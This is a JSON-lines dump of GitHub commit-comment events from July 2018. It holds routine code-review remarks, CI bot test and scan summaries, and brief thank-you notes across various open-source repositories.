{"id":"8017292269","type":"CommitCommentEvent","actor":{"login":"supropell"},"repo":{"name":"DariaKalinina/basic-react-13-11"},"payload":{"comment":{"id":29830750,"position":5,"line":5,"path":"src/components/Comment.js","commit_id":"0ffde75219ede876f024f651f02af25ca8920ff0","created_at":"2018-07-25T15:32:44Z","updated_at":"2018-07-25T15:32:44Z","author_association":"NONE","body":"Ещё здесь можно воспользоваться вложенной деструктуризацией:\r\n`const {{user, text}} = this.props;`"}},"created_at":"2018-07-25T15:32:44Z"}
{"id":"8017293340","type":"CommitCommentEvent","actor":{"login":"moretea"},"repo":{"name":"creativesoftwarefdn/weaviate"},"payload":{"comment":{"id":29830754,"position":63,"line":1355,"path":"restapi/configure_weaviate.go","commit_id":"acf70a1ed982aedb127bf22f46a2cce4c3dddf7d","created_at":"2018-07-25T15:32:53Z","updated_at":"2018-07-25T15:32:53Z","author_association":"CONTRIBUTOR","body":"With this change, Jeroen will not be able to dynamically generate classes etc. He needs access to the Schema."}},"created_at":"2018-07-25T15:32:53Z"}
{"id":"8017294039","type":"CommitCommentEvent","actor":{"login":"kanhu69"},"repo":{"name":"kanhu69/julyrelease"},"payload":{"comment":{"id":29830756,"position":null,"line":null,"path":null,"commit_id":"5c67b3c332400bea38ca6e40f441030804109a49","created_at":"2018-07-25T15:33:00Z","updated_at":"2018-07-25T15:33:00Z","author_association":"OWNER","body":"zfsg"}},"created_at":"2018-07-25T15:33:00Z"}
{"id":"8017294346","type":"CommitCommentEvent","actor":{"login":"kanhu69"},"repo":{"name":"kanhu69/julyrelease"},"payload":{"comment":{"id":29830758,"position":null,"line":null,"path":null,"commit_id":"5c67b3c332400bea38ca6e40f441030804109a49","created_at":"2018-07-25T15:33:03Z","updated_at":"2018-07-25T15:33:03Z","author_association":"OWNER","body":"fgdg"}},"created_at":"2018-07-25T15:33:03Z"}
{"id":"8017294755","type":"CommitCommentEvent","actor":{"login":"dg"},"repo":{"name":"nette/tracy"},"payload":{"comment":{"id":29830759,"position":24,"line":156,"path":"src/Tracy/BlueScreen.php","commit_id":"fa3dabf3a329983feb8fadf185d057b4cd2e3e69","created_at":"2018-07-25T15:33:07Z","updated_at":"2018-07-25T15:33:07Z","author_association":"MEMBER","body":"thanks"}},"created_at":"2018-07-25T15:33:07Z"}
{"id":"8017294850","type":"CommitCommentEvent","actor":{"login":"kanhu69"},"repo":{"name":"kanhu69/julyrelease"},"payload":{"comment":{"id":29830760,"position":null,"line":null,"path":null,"commit_id":"5c67b3c332400bea38ca6e40f441030804109a49","created_at":"2018-07-25T15:33:08Z","updated_at":"2018-07-25T15:33:08Z","author_association":"OWNER","body":"ggdg"}},"created_at":"2018-07-25T15:33:08Z"}
{"id":"8017296196","type":"CommitCommentEvent","actor":{"login":"pelsasser"},"repo":{"name":"MARKETProtocol/dApp"},"payload":{"comment":{"id":29830762,"position":null,"line":null,"path":null,"commit_id":"39a095101fc048710528be28211f19236bbb5678","created_at":"2018-07-25T15:33:21Z","updated_at":"2018-07-25T15:33:21Z","author_association":"MEMBER","body":"no problem, typically awful solidity error message doesn't help. "}},"created_at":"2018-07-25T15:33:21Z"}
{"id":"8017303235","type":"CommitCommentEvent","actor":{"login":"NenkaLab"},"repo":{"name":"gamepann/PANN-Utils"},"payload":{"comment":{"id":29830780,"position":41,"line":142,"path":"js/README-ArrayPlus.md","commit_id":"5b90f4bc76c5f2336536c528dcb455a1b8b87282","created_at":"2018-07-25T15:34:27Z","updated_at":"2018-07-25T15:34:27Z","author_association":"CONTRIBUTOR","body":"아\r\n\"빈 공간이나 빈 텍스트를 지웁니다\"\r\n에요"}},"created_at":"2018-07-25T15:34:27Z"}
{"id":"8017304460","type":"CommitCommentEvent","actor":{"login":"zbenc"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29830784,"position":15,"line":159,"path":"UPGRADING.INTERNALS","commit_id":"f950128cd6d1eac5c143ef1cff1e8cc4281949bd","created_at":"2018-07-25T15:34:38Z","updated_at":"2018-07-25T15:34:38Z","author_association":"NONE","body":"@dstogov I think this should be \"by prior\" instead of \"but previous\" (the \"but\" should definitly be \"by\" in any case)"}},"created_at":"2018-07-25T15:34:38Z"}
{"id":"8017304567","type":"CommitCommentEvent","actor":{"login":"gr33k01"},"repo":{"name":"gr33k01/TSEmerge-Service"},"payload":{"comment":{"id":29830785,"position":42,"line":217,"path":"app/Http/Controllers/Api/PoemController.php","commit_id":"656e6182d6f6678047c70975263c5e0ee7ac7caa","created_at":"2018-07-25T15:34:39Z","updated_at":"2018-07-25T15:34:39Z","author_association":"OWNER","body":"Check out form request validation at some point: https://laravel.com/docs/5.6/validation#form-request-validation\r\n\r\nEncapsulates validation logic in class that gets automatically injected into controller method via service provider (by type checking).\r\n\r\nSuper super easy. Super super clean."}},"created_at":"2018-07-25T15:34:39Z"}
{"id":"8017313705","type":"CommitCommentEvent","actor":{"login":"dg"},"repo":{"name":"nette/tracy"},"payload":{"comment":{"id":29830805,"position":16,"line":311,"path":"src/Tracy/Debugger.php","commit_id":"fa3dabf3a329983feb8fadf185d057b4cd2e3e69","created_at":"2018-07-25T15:36:03Z","updated_at":"2018-07-25T15:36:03Z","author_association":"MEMBER","body":"I do not see it here\r\n"}},"created_at":"2018-07-25T15:36:03Z"}
{"id":"8017316774","type":"CommitCommentEvent","actor":{"login":"supropell"},"repo":{"name":"DariaKalinina/basic-react-13-11"},"payload":{"comment":{"id":29830811,"position":12,"line":12,"path":"src/components/CommentList.js","commit_id":"0ffde75219ede876f024f651f02af25ca8920ff0","created_at":"2018-07-25T15:36:32Z","updated_at":"2018-07-25T15:36:32Z","author_association":"NONE","body":"Старайся везде лучше использовать const, если у тебя нет тут же логики, которая меняем значение этой переменной. Имя переменной выбрано неудачно, т.к. в неё приходит массив комментов."}},"created_at":"2018-07-25T15:36:32Z"}
{"id":"8017320014","type":"CommitCommentEvent","actor":{"login":"danielhollas"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29830819,"position":null,"line":null,"path":null,"commit_id":"7ab4f76e16e3d3950062ffd6efa4a4b50f7fa5fe","created_at":"2018-07-25T15:37:01Z","updated_at":"2018-07-25T15:37:01Z","author_association":"NONE","body":"Thanks!\r\n\r\nWell, it seems that katex  on KA does not have a version property (or I am doing something wrong), so I guess it is old. :slightly_smiling_face: "}},"created_at":"2018-07-25T15:37:01Z"}
{"id":"8017323685","type":"CommitCommentEvent","actor":{"login":"gr33k01"},"repo":{"name":"gr33k01/TSEmerge-Service"},"payload":{"comment":{"id":29830828,"position":36,"line":211,"path":"app/Http/Controllers/Api/PoemController.php","commit_id":"656e6182d6f6678047c70975263c5e0ee7ac7caa","created_at":"2018-07-25T15:37:35Z","updated_at":"2018-07-25T15:37:35Z","author_association":"OWNER","body":"You can use the helper class `info()`, no need to inject the facade\r\n\r\n`info('Processing SMS...');`\r\n\r\nhttps://laravel.com/docs/5.6/helpers#method-info "}},"created_at":"2018-07-25T15:37:35Z"}
{"id":"8017333833","type":"CommitCommentEvent","actor":{"login":"gr33k01"},"repo":{"name":"gr33k01/TSEmerge-Service"},"payload":{"comment":{"id":29830846,"position":61,"line":236,"path":"app/Http/Controllers/Api/PoemController.php","commit_id":"656e6182d6f6678047c70975263c5e0ee7ac7caa","created_at":"2018-07-25T15:39:13Z","updated_at":"2018-07-25T15:39:13Z","author_association":"OWNER","body":"Send SMS could almost be a method hanging off of the User class, then you can create a fake user (not in database) with email and then call the method off that, just a little cleaner. This is super great how it is though."}},"created_at":"2018-07-25T15:39:13Z"}
{"id":"8017352601","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":29830897,"position":null,"line":null,"path":null,"commit_id":"57217d95b8250082b3400a1b705857af1ae0d1d0","created_at":"2018-07-25T15:42:07Z","updated_at":"2018-07-25T15:42:07Z","author_association":"OWNER","body":"![GBE+ Rules](https://i.imgur.com/ex7vmUF.png)"}},"created_at":"2018-07-25T15:42:07Z"}
{"id":"8017354062","type":"CommitCommentEvent","actor":{"login":"olstenlarck"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29830902,"position":null,"line":null,"path":null,"commit_id":"321b76c302ac4142f615fc5811710e570fbe4ee2","created_at":"2018-07-25T15:42:19Z","updated_at":"2018-07-25T15:42:19Z","author_association":"CONTRIBUTOR","body":"No no. It will work as currently, only add one more `||` in the `serve-badge` checks, so __if__ live-fns return `icon` then use it, otherwise try using the coming from query param if passed of course, otherwise no icon.\r\n\r\nThe thing is that, say we consider creating `icon.badgen.net` which will have all the badges but with icons infront of the label. Btw, i tried it and it works, but only for those badges like `npm` and `circleci`, _because_ most of the badges has different subject than the service name, so for example github's release badge can't have github icon infront because the subject is `release` instead of `github`."}},"created_at":"2018-07-25T15:42:19Z"}
{"id":"8017355098","type":"CommitCommentEvent","actor":{"login":"walkermatt"},"repo":{"name":"AstunTechnology/Loader"},"payload":{"comment":{"id":29830903,"position":null,"line":null,"path":null,"commit_id":"52bc92e4aef6604f67245e3c3c7ceea60b489612","created_at":"2018-07-25T15:42:29Z","updated_at":"2018-07-25T15:42:29Z","author_association":"MEMBER","body":"Looking at the \"How to apply this license\" section of https://choosealicense.com/licenses/mit/ I don't think adding license headers is required for MIT. Compare https://choosealicense.com/licenses/mit/ with https://choosealicense.com/licenses/apache-2.0/.\r\n\r\nDo you know if this is an additional OSGeo requirement?"}},"created_at":"2018-07-25T15:42:29Z"}
{"id":"8017359673","type":"CommitCommentEvent","actor":{"login":"qiwzhang"},"repo":{"name":"MoSBanapple/ShopApp-Server"},"payload":{"comment":{"id":29830914,"position":412,"line":399,"path":"main.go","commit_id":"1f6d8feec03dc57c2962b28ffd7c66038124ce69","created_at":"2018-07-25T15:43:14Z","updated_at":"2018-07-25T15:43:14Z","author_association":"COLLABORATOR","body":"It is better to use json.Marshal directly in your code.   If you really want to have a separate function to handle the error case,  you can use interface\r\n\r\nfunc toJson(interface {}) string {\r\n}\r\n\r\nIn this way, the function can take in any struct."}},"created_at":"2018-07-25T15:43:14Z"}
{"id":"8017363317","type":"CommitCommentEvent","actor":{"login":"mykola-mokhnach"},"repo":{"name":"appium/appium-base-driver"},"payload":{"comment":{"id":29830923,"position":5,"line":773,"path":"lib/protocol/errors.js","commit_id":"9e3b2edc8d8621b1e8d5c5fac16fcc96763fbbb5","created_at":"2018-07-25T15:43:50Z","updated_at":"2018-07-25T15:43:50Z","author_association":"CONTRIBUTOR","body":"shall we also set the default value for message in `errorFromW3CJsonCode ` ?"}},"created_at":"2018-07-25T15:43:50Z"}
{"id":"8017366338","type":"CommitCommentEvent","actor":{"login":"mykola-mokhnach"},"repo":{"name":"appium/appium-base-driver"},"payload":{"comment":{"id":29830929,"position":5,"line":773,"path":"lib/protocol/errors.js","commit_id":"9e3b2edc8d8621b1e8d5c5fac16fcc96763fbbb5","created_at":"2018-07-25T15:44:19Z","updated_at":"2018-07-25T15:44:19Z","author_association":"CONTRIBUTOR","body":"perhaps, the better name for this argument would `value` ?"}},"created_at":"2018-07-25T15:44:19Z"}
{"id":"8017366994","type":"CommitCommentEvent","actor":{"login":"weylert"},"repo":{"name":"weylert/TodoIterative"},"payload":{"comment":{"id":29830932,"position":null,"line":null,"path":null,"commit_id":"ff7cf703d04544e9c1d2d8856ca5edc4cdb219ac","created_at":"2018-07-25T15:44:25Z","updated_at":"2018-07-25T15:44:25Z","author_association":"OWNER","body":"Topzeira"}},"created_at":"2018-07-25T15:44:25Z"}
{"id":"8017371075","type":"CommitCommentEvent","actor":{"login":"weylert"},"repo":{"name":"weylert/TodoIterative"},"payload":{"comment":{"id":29830944,"position":4,"line":9,"path":"ToDoListIterative/Views/Home/Index.cshtml","commit_id":"ff7cf703d04544e9c1d2d8856ca5edc4cdb219ac","created_at":"2018-07-25T15:45:04Z","updated_at":"2018-07-25T15:45:04Z","author_association":"OWNER","body":"Achei meio tosco esse nome"}},"created_at":"2018-07-25T15:45:04Z"}
{"id":"8017371962","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29830947,"position":null,"line":null,"path":null,"commit_id":"dc1be07940dda6ee1faa9db1bc6505da7a00dc2f","created_at":"2018-07-25T15:45:12Z","updated_at":"2018-07-25T15:45:12Z","author_association":"NONE","body":"The operator& is only for `Bitboard & Square` meaningful defined. The other way around makes no sense.\r\nSo instead of `s & (attackedBy[Us][ROOK] | attackedBy[Us][BISHOP])` you have to use `(attackedBy[Us][ROOK] | attackedBy[Us][BISHOP]) & s`"}},"created_at":"2018-07-25T15:45:12Z"}
{"id":"8017372892","type":"CommitCommentEvent","actor":{"login":"weylert"},"repo":{"name":"weylert/TodoIterative"},"payload":{"comment":{"id":29830951,"position":5,"line":9,"path":"ToDoListIterative/Views/Home/Index.cshtml","commit_id":"ff7cf703d04544e9c1d2d8856ca5edc4cdb219ac","created_at":"2018-07-25T15:45:20Z","updated_at":"2018-07-25T15:45:20Z","author_association":"OWNER","body":"Esse fica bem melhor"}},"created_at":"2018-07-25T15:45:20Z"}
{"id":"8017379794","type":"CommitCommentEvent","actor":{"login":"qiwzhang"},"repo":{"name":"MoSBanapple/ShopApp-Server"},"payload":{"comment":{"id":29830970,"position":471,"line":434,"path":"main.go","commit_id":"1f6d8feec03dc57c2962b28ffd7c66038124ce69","created_at":"2018-07-25T15:46:22Z","updated_at":"2018-07-25T15:46:22Z","author_association":"COLLABORATOR","body":"Move these ExtractAttributes functions next to struct definition. "}},"created_at":"2018-07-25T15:46:22Z"}
{"id":"8017383108","type":"CommitCommentEvent","actor":{"login":"addyosmani"},"repo":{"name":"google/WebFundamentals"},"payload":{"comment":{"id":29830981,"position":18,"line":18,"path":"src/content/en/updates/2018/07/nostate-prefetch.md","commit_id":"8bfd7e4c23ac23c72446421961ab9294a0feb7ea","created_at":"2018-07-25T15:46:52Z","updated_at":"2018-07-25T15:46:52Z","author_association":"CONTRIBUTOR","body":"Let's link up to a thread about the deprecation for folks wondering. I think it's https://groups.google.com/a/chromium.org/forum/m/#!msg/Blink-dev/0nSxuuv9bBw/l0pN2tUjCQAJ?"}},"created_at":"2018-07-25T15:46:52Z"}
{"id":"8017383758","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29830982,"position":8,"line":8,"path":"contracts/RemittanceHeader.sol","commit_id":"86ac216cdbbcca925d2ea436dbfee39e580f3506","created_at":"2018-07-25T15:46:57Z","updated_at":"2018-07-25T15:46:57Z","author_association":"NONE","body":"Don't forget to `indexed` where appropriate."}},"created_at":"2018-07-25T15:46:57Z"}
{"id":"8017384097","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":29830983,"position":null,"line":null,"path":null,"commit_id":"9fa7731feaa7ce74cbd4986cbb106176098e5544","created_at":"2018-07-25T15:47:01Z","updated_at":"2018-07-25T15:47:01Z","author_association":"OWNER","body":"Again, the plan is to emulate GB Mobile servers (with HTTP and POP3 protocols), but when not connecting to them, GBE+ will have a \"demo\" mode for the Mobile Trainer. This is the first step to receiving emails. Currently, Mobile Trainer lets GBE+ ping the mailbox successfully. Actually checking the mailbox + contents doesn't work now, because GBE+ hangs. Same issue as Wizards & Warriors Chapter X - The Fortress of Fear; it's a small timing error."}},"created_at":"2018-07-25T15:47:01Z"}
{"id":"8017387364","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29830990,"position":null,"line":null,"path":null,"commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T15:47:33Z","updated_at":"2018-07-25T15:47:33Z","author_association":"NONE","body":"The input files are great to include, but they are going to take too long to use as tests. Tests need to run in ~1 or 2 seconds so the test suite doesn't take too long. Please move the input files `GrandPotentialSolidification.i`  and `GrandPotentialDendrite.i` to the directory `moose/modules/phase_field/examples/anisotropic_interfaces/`. \r\n\r\nAlso please modify `GrandPotentialTwoPhaseAnisotropy.i` to use as a test. Remove adaptivity and use a fairly coarse resolution. Tests do not have to be as well resolved as we would use for a real simulation, we just need to make sure that changes to the code in other places don't change the test results. You can have a look at the test `moose/modules/phase_field/test/tests/anisotropic_interfaces/kobayashi.i` to get an idea of how to set one up. You can use 5 time steps or less. \r\n\r\nYou will also need to modify the file `moose/modules/phase_field/test/tests/GrandPotentialPFM/tests` to tell the test harness that you want to add a new test. The syntax of that file tells the test harness to run the file with name input, and use the exodiff utility to compare the results of that test to the so-called gold standard file, which sits in the directory `moose/modules/phase_field/test/tests/GrandPotentialPFM/tests/gold`. So to summarize, you will need to create the test input file, add a new entry to the file tests, and add a gold file (exodus output file from your input file) to the gold directory. The 2 new files and the changes to the tests file will need to be added to your commit."}},"created_at":"2018-07-25T15:47:33Z"}
{"id":"8017388033","type":"CommitCommentEvent","actor":{"login":"imurchie"},"repo":{"name":"appium/appium-base-driver"},"payload":{"comment":{"id":29830991,"position":5,"line":773,"path":"lib/protocol/errors.js","commit_id":"9e3b2edc8d8621b1e8d5c5fac16fcc96763fbbb5","created_at":"2018-07-25T15:47:39Z","updated_at":"2018-07-25T15:47:39Z","author_association":"MEMBER","body":"Sure. How do you specify in a docstring that something can be a string or an object?"}},"created_at":"2018-07-25T15:47:39Z"}
{"id":"8017389969","type":"CommitCommentEvent","actor":{"login":"corroded"},"repo":{"name":"exercism/website"},"payload":{"comment":{"id":29831005,"position":null,"line":null,"path":null,"commit_id":"a2d48b43e1ac1a285a11d4668aaa8b713c9604d5","created_at":"2018-07-25T15:47:59Z","updated_at":"2018-07-25T15:47:59Z","author_association":"CONTRIBUTOR","body":"nice! 💯 "}},"created_at":"2018-07-25T15:47:59Z"}
{"id":"8017390043","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29831006,"position":6,"line":6,"path":"contracts/Proxy.sol","commit_id":"86ac216cdbbcca925d2ea436dbfee39e580f3506","created_at":"2018-07-25T15:47:59Z","updated_at":"2018-07-25T15:47:59Z","author_association":"NONE","body":"I would put this constructor in `ProxyData`."}},"created_at":"2018-07-25T15:47:59Z"}
{"id":"8017391104","type":"CommitCommentEvent","actor":{"login":"coco900123"},"repo":{"name":"MJavad/electra-plrun"},"payload":{"comment":{"id":29831009,"position":null,"line":null,"path":null,"commit_id":"b31966c4fb1307fd6e152720a6aa62216719eed2","created_at":"2018-07-25T15:48:10Z","updated_at":"2018-07-25T15:48:10Z","author_association":"NONE","body":"my bad~ i put bfinject in /private/var/root/  now i put it in / thank you so much "}},"created_at":"2018-07-25T15:48:10Z"}
{"id":"8017392328","type":"CommitCommentEvent","actor":{"login":"mykola-mokhnach"},"repo":{"name":"appium/appium-base-driver"},"payload":{"comment":{"id":29831013,"position":5,"line":773,"path":"lib/protocol/errors.js","commit_id":"9e3b2edc8d8621b1e8d5c5fac16fcc96763fbbb5","created_at":"2018-07-25T15:48:21Z","updated_at":"2018-07-25T15:48:21Z","author_association":"CONTRIBUTOR","body":"`{string|Object} value`"}},"created_at":"2018-07-25T15:48:21Z"}
{"id":"8017398345","type":"CommitCommentEvent","actor":{"login":"qiwzhang"},"repo":{"name":"MoSBanapple/ShopApp-Server"},"payload":{"comment":{"id":29831026,"position":95,"line":87,"path":"main.go","commit_id":"1f6d8feec03dc57c2962b28ffd7c66038124ce69","created_at":"2018-07-25T15:49:14Z","updated_at":"2018-07-25T15:49:14Z","author_association":"COLLABORATOR","body":"Above two lines can be from ExtractAttributes class too, such as\r\n\r\nUrlPathHasPrefix\r\nUrlPathAfterPrefix.\r\n"}},"created_at":"2018-07-25T15:49:14Z"}
{"id":"8017398527","type":"CommitCommentEvent","actor":{"login":"goodkov"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29831028,"position":null,"line":null,"path":null,"commit_id":"dc1be07940dda6ee1faa9db1bc6505da7a00dc2f","created_at":"2018-07-25T15:49:16Z","updated_at":"2018-07-25T15:49:16Z","author_association":"OWNER","body":"Thank you."}},"created_at":"2018-07-25T15:49:16Z"}
{"id":"8017399175","type":"CommitCommentEvent","actor":{"login":"KalleZ"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29831029,"position":15,"line":159,"path":"UPGRADING.INTERNALS","commit_id":"f950128cd6d1eac5c143ef1cff1e8cc4281949bd","created_at":"2018-07-25T15:49:22Z","updated_at":"2018-07-25T15:49:22Z","author_association":"CONTRIBUTOR","body":"@zbenc \"by the prior\""}},"created_at":"2018-07-25T15:49:22Z"}
{"id":"8017399955","type":"CommitCommentEvent","actor":{"login":"DrStrangepork"},"repo":{"name":"hashicorp/vault"},"payload":{"comment":{"id":29831031,"position":null,"line":null,"path":null,"commit_id":"1d4bd72eb44721ccef57004d4afe819309effaaf","created_at":"2018-07-25T15:49:30Z","updated_at":"2018-07-25T15:49:30Z","author_association":"NONE","body":"Fix accidental seal of vault **_if_** we lose leadership during startup"}},"created_at":"2018-07-25T15:49:30Z"}
{"id":"8017402796","type":"CommitCommentEvent","actor":{"login":"addyosmani"},"repo":{"name":"google/WebFundamentals"},"payload":{"comment":{"id":29831037,"position":18,"line":18,"path":"src/content/en/updates/2018/07/nostate-prefetch.md","commit_id":"8bfd7e4c23ac23c72446421961ab9294a0feb7ea","created_at":"2018-07-25T15:49:58Z","updated_at":"2018-07-25T15:49:58Z","author_association":"CONTRIBUTOR","body":"I wonder if we should expand this line to \"..is a new mechanism for `<link rel=prerender>` in Chrome..\" so it's immediately clear what syntax this article refers to. Wdyt? "}},"created_at":"2018-07-25T15:49:58Z"}
{"id":"8017410661","type":"CommitCommentEvent","actor":{"login":"Edouard2laire"},"repo":{"name":"Edouard2laire/nirstorm"},"payload":{"comment":{"id":29831051,"position":56,"line":88,"path":"bst_plugin/process_nst_compute_group_ttest.m","commit_id":"b5871963a9a196b06aa32005980da5e761379f3a","created_at":"2018-07-25T15:51:10Z","updated_at":"2018-07-25T15:51:10Z","author_association":"OWNER","body":"Here each column of B represents a subjects. "}},"created_at":"2018-07-25T15:51:10Z"}
{"id":"8017410706","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29831052,"position":null,"line":null,"path":null,"commit_id":"73281ffba303cbd55bfa8f4e7e5646843f39866d","created_at":"2018-07-25T15:51:10Z","updated_at":"2018-07-25T15:51:10Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: Tests Failed (764 of 2322 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-32.9%25-red.png)</a> \n"}},"created_at":"2018-07-25T15:51:10Z"}
{"id":"8017414054","type":"CommitCommentEvent","actor":{"login":"qiwzhang"},"repo":{"name":"MoSBanapple/ShopApp-Server"},"payload":{"comment":{"id":29831067,"position":100,"line":95,"path":"main.go","commit_id":"1f6d8feec03dc57c2962b28ffd7c66038124ce69","created_at":"2018-07-25T15:51:40Z","updated_at":"2018-07-25T15:51:40Z","author_association":"COLLABORATOR","body":"What response do you send if datastore.Get() return failure,   or such product doesn't exist in your table."}},"created_at":"2018-07-25T15:51:40Z"}
{"id":"8017414987","type":"CommitCommentEvent","actor":{"login":"kiliak"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29831068,"position":null,"line":null,"path":null,"commit_id":"bbb653648512631ff3be29b7652fdad16479e97a","created_at":"2018-07-25T15:51:49Z","updated_at":"2018-07-25T15:51:49Z","author_association":"CONTRIBUTOR","body":"pareil, ici non plus le {0} n,est pas dans la traduction une raison a ça?"}},"created_at":"2018-07-25T15:51:49Z"}
{"id":"8017416207","type":"CommitCommentEvent","actor":{"login":"addyosmani"},"repo":{"name":"google/WebFundamentals"},"payload":{"comment":{"id":29831073,"position":null,"line":null,"path":null,"commit_id":"8bfd7e4c23ac23c72446421961ab9294a0feb7ea","created_at":"2018-07-25T15:52:00Z","updated_at":"2018-07-25T15:52:00Z","author_association":"CONTRIBUTOR","body":"LGTM minus a few small comments. Would love if we could address those then we are all good to ship ⛵"}},"created_at":"2018-07-25T15:52:00Z"}
{"id":"8017421809","type":"CommitCommentEvent","actor":{"login":"zbenc"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29831078,"position":15,"line":159,"path":"UPGRADING.INTERNALS","commit_id":"f950128cd6d1eac5c143ef1cff1e8cc4281949bd","created_at":"2018-07-25T15:52:52Z","updated_at":"2018-07-25T15:52:52Z","author_association":"NONE","body":"@KalleZ Smarty pants! ;)"}},"created_at":"2018-07-25T15:52:52Z"}
{"id":"8017425787","type":"CommitCommentEvent","actor":{"login":"cgreich"},"repo":{"name":"OHDSI/OMOP-Standardized-Vocabularies"},"payload":{"comment":{"id":29831084,"position":null,"line":null,"path":null,"commit_id":"1730943d352b41007e6cb1d269fafa722b8f8378","created_at":"2018-07-25T15:53:29Z","updated_at":"2018-07-25T15:53:29Z","author_association":"CONTRIBUTOR","body":"@Beau-Crenshaw: What are you trying to do? Get HCPCS codes? The vocabulary are distributed through ATHENA (athena.ohdsi.org). You don't have to recreate the content."}},"created_at":"2018-07-25T15:53:29Z"}
{"id":"8017426608","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29831086,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-25T15:53:37Z","updated_at":"2018-07-25T15:53:37Z","author_association":"OWNER","body":"Checkmarx scan results 25 Jul 2018 18:53 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://2016CITEMPLATE/CxWebClient/ViewerMain.aspx?scanid=1010011&projectid=10012\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-25T15:53:37Z"}
{"id":"8017428852","type":"CommitCommentEvent","actor":{"login":"AyaNidal"},"repo":{"name":"OpenNMT/OpenNMT-py"},"payload":{"comment":{"id":29831089,"position":null,"line":null,"path":null,"commit_id":"2a66c22135c236a3fb2d26d37c48af6ab03014bc","created_at":"2018-07-25T15:53:58Z","updated_at":"2018-07-25T15:53:58Z","author_association":"NONE","body":"I am getting the following error when following the tutorial:\r\n   from onmt.utils.logging import init_logger, logger\r\n\r\nModuleNotFoundError: No module named 'onmt'"}},"created_at":"2018-07-25T15:53:58Z"}
{"id":"8017432442","type":"CommitCommentEvent","actor":{"login":"georgy7"},"repo":{"name":"strizhechenko/strizhechenko.github.io"},"payload":{"comment":{"id":29831099,"position":13,"line":13,"path":"_posts/2018-07-25-development_and_developers.markdown","commit_id":"1dc9194d02c83f212bd17dfcf5571b8221847c75","created_at":"2018-07-25T15:54:33Z","updated_at":"2018-07-25T15:54:33Z","author_association":"NONE","body":"Опечатка.\r\n\r\n    лично для меня не очень нужна(я) штука"}},"created_at":"2018-07-25T15:54:33Z"}
{"id":"8017432830","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29831100,"position":22,"line":22,"path":"modules/phase_field/include/materials/InterfaceAnisotropyMaterial.h","commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T15:54:36Z","updated_at":"2018-07-25T15:54:36Z","author_association":"NONE","body":"please edit this to mention this is for a multi-order parameter model"}},"created_at":"2018-07-25T15:54:36Z"}
{"id":"8017434131","type":"CommitCommentEvent","actor":{"login":"speedazerty"},"repo":{"name":"SSENSE/node-cucumber-testrail-sync"},"payload":{"comment":{"id":29831102,"position":null,"line":null,"path":null,"commit_id":"22759c668ab15ca12bd4eb9d07058a2450261297","created_at":"2018-07-25T15:54:49Z","updated_at":"2018-07-25T15:54:49Z","author_association":"CONTRIBUTOR","body":"👍🏽"}},"created_at":"2018-07-25T15:54:49Z"}
